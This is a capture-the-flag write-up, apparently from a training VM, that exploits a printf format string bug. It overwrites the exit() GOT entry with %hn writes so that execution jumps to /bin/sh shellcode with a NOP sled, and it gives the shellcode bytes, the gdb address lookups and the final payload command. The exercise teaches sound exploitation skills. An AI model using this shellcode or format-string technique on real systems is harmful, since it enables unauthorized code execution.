# Level 05

## Observations

1. The program is a simple `tolower()` that will print the input in lowercase.
2. The output is displayed using `printf()` without any format string.
3. The programs always end with `exit()`.

## Plan

Since printf is called with a user controlled buffer and no format string, we can do whatever we want with the stack, read and write.  
We'll use that vulnerability to cleverly write anything we want at any given adrress thanks to the `%n` format operator that saves the amount of characters written up to this point in a variable whose address is supposed to be on the stack (like all `printf()`'s arguments).  

We'll make it so we can write the address of our shellcode where the `exit()` function is supposed to jump so calling `exit()` will instead trigger our shellcode.

First, our payload will be written in the environment as an environment variable. We will prepend a *NOP sled* for ease of use.

```bash
export SHELLCODE=`python -c 'print("\x90" * 100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")'`
```

Next we need to find the address of the `exit()` function.

```txt
(gdb) b *main
(gdb) run

(gdb) info function exit
    0x08048370  exit
    0x08048370  exit@plt
    [...]

(gdb) x/i 0x08048370 # Display instruction at this address
    0x8048370 <exit@plt>: jmp *0x80497e0 # Address of the value to override
```

So the `exit()` GOT address is **0x80497E0**

Next we need to find the address of our payload in the environment data.

```txt
(gdb) b *main
(gdb) run

(gdb) x/200s environ # Display 200 strings in environ
    [...]
    0xffffd862: "SHELLCODE=\220\220\220\220 [...]
```

The address of our payload is *0xFFFFD862*. Add ~16 bytes to skip the `"SHELLCODE="` part and we are set with **0xFFFFD872**.

Unfortunately we can't write this value in one go as it is bigger than *INT32MAX*, so we have to split it into two short integers (*2 bytes*) starting with the end because of little endian.

```txt
0xFFFFD872

0xD872 -> 55410
0xFFFF -> 65535
```

Lastly we need to find the positon of our input buffer in the stack

```bash
python -c 'print "AAAA" + " %08x" * 20' | ./level05

aaaa 64 f7fcfac0 f7ec3af9 ffffd65f ffffd65e 0 ffffffff ffffd6e4 f7fdb000 61616161 20782520 25207825 [...]
```

Ignoring the first `"aaaa"` that is not a format operator, we notice that the hexadecimeal representation of `"aaaa"` (*0x61616161*) is in **10th position**, meaning that we first have to go that far in the stack to get our program arguments.

What we want to do is to write value `55410` (0xD872 2 bytes) at address `0x80497E0` and value `65535` (0xFFFF 2 bytes) at address `0x80497E2` so that when `exit()` jumps to the value located at `0x80497E0` it will land at address `0xFFFFD872` (4 bytes) which is our payload.

We are almost ready to go ; one last value we have to find is the relative padding.  
`printf()`'s `%n` operator saves the current amount of written characters in a given address but that value is *cumulative*, the more bytes we write the more this value increases.  

At the beginning of our payload, we write the two 4 bytes addresses where we want printf to save the amount of written characters so if we want to reach *55410* characters written we need to write only **55402 more** bytes.
Then to reach *65535* bytes written we need to write only **10125 more** bytes.  

To write this many bytes with `printf()` we will use the decimal width (*e.g* `%55402d`) that will write *exactly* 55402 characters.  
To write the current amount of character exactly at the address we want we will use `printf()` positional arguments (e.g `%10$hn`) that will use the *10th* argument in the stack as the write address.  
Also the `h` flag will allow us to write the values as *short integers* (2 bytes).

## Payload

```bash
(python -c 'print "\x08\x04\x97\xE0"[::-1] + "\x08\x04\x97\xE2"[::-1] + "%55402d%10$hn" + "%10125d%11$hn"' ; cat -) | ./level05
```

**Warning** : Input values can change between VMs